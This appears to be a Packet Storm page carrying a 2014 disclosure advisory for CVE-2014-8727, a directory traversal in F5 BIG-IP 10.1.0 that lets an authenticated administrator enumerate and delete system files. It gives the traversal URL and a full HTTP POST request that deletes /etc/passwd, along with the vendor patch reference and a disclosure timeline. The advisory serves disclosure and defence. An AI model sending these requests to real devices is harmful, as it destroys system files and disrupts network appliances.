what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

F5 BIG-IP 10.1.0 Directory Traversal

F5 BIG-IP 10.1.0 Directory Traversal
Posted Nov 12, 2014
Authored by Anastasios Monachos

F5 BIG-IP version 10.1.0 suffers from a directory traversal vulnerability that can allow an authenticated user the ability to delete any system file and enumerate their existence.

tags | exploit
advisories | CVE-2014-8727
SHA-256 | 48c9228a0d762c37bb5420392618ef603f34d99d02096e06b809d1aaf78e9bb6

F5 BIG-IP 10.1.0 Directory Traversal

Change Mirror Download
+------------------------------------------------------+
+ F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability +
+------------------------------------------------------+
Affected Product : F5 BIG-IP
Vendor Homepage : http://www.f5.com/
Version : 10.1.0
Vulnerability Category : Local vulnerability
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
CVE : CVE-2014-8727
Patched : Yes

+-------------+
+ Description +
+-------------+
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to arbitrary enumerate files and subsequently delete them off the OS level. Any system file deletion, for instance under /etc, /boot etc would have a major functionality and operational impact for the device.

+----------------------+
+ Exploitation Details +
+----------------------+
An authenticated user with either "Resource Administrator" or "Administrator" role privileges is able to enumerate files on the operating system and subsequently delete them off the OS level.

In order to trigger the flaw, send a HTTP GET request similar to: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
Condition: If file does not exist the application will return "File not found." If the file exists, the user can either send, a similar to, the next HTTP POST request or simply click on the Delete button through the GUI -the button will be displayed only if the enumerated file exists-.

Sample HTTP POST request:

POST /tmui/Control/form HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<ip>/tmui/Control/jspmap/tmui/system/archive/properties.jsp?name=../../../../../etc/passwd
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 937

_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete

+----------+
+ Solution +
+----------+
F5 has already patched and mitigated the issue, for more information see ID363027 at the following URL:
https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13109.html
https://support.f5.com/kb/en-us/products/big-ip_ltm/releasenotes/product/relnote_11_0_0_ltm.html

+---------------------+
+ Disclosure Timeline +
+---------------------+
03-11-2014: Vendor notified at security-reporting [at] f5 [dot] com
04-11-2014: Vendor responded with intent to investigate
04-11-2014: Shared details with vendor
05-11-2014: Vendor confirmed the issue is already patched, reference ID363027
12-11-2014: Public disclosure
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close